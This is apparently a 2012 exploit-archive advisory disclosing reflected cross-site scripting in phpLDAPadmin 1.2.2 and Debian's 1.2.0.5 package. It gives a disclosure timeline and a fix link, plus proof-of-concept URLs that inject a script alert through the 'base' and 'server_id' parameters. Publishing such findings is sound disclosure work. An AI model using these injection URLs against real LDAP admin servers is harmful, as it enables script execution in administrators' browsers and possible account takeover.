Home / exploits phpldapadmin 1.2.2 Cross Site Scripting
Posted on 02 February 2012
Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously coordinate with the Cert-US in order they contact with Sourceforge and Debian, but receive they was unable to put in contact with them. The first discover was on January 10 for 1.1.6 version, where after noticed that the same vulnerability was discover previously. For that reason I tested later for version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package). More reference: see the files attached On January 24 I contacted to sourceforge and appear they fix the package but still persistence on debian packages. Fix from sourceforge: https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546 Background: =========== phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. Details: ======== 1.- Version 1.2.2 from Sourceforge package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download Exploitables URI's: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search PoC: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search Exploitable variable: base Results: XSS passing through "base" variable. 2.- Version 1.2.0.5 from debian (testing and unstable repositories) Package: Version: 1.2.0.5-2 Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0 Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb Size: 1276080 MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7 SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57 PoC: https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script> https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false Exploitable Variable: server_id Results: XSS passing through "server_id" variable. Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors. Thanks in advance for your comments Kind Regards
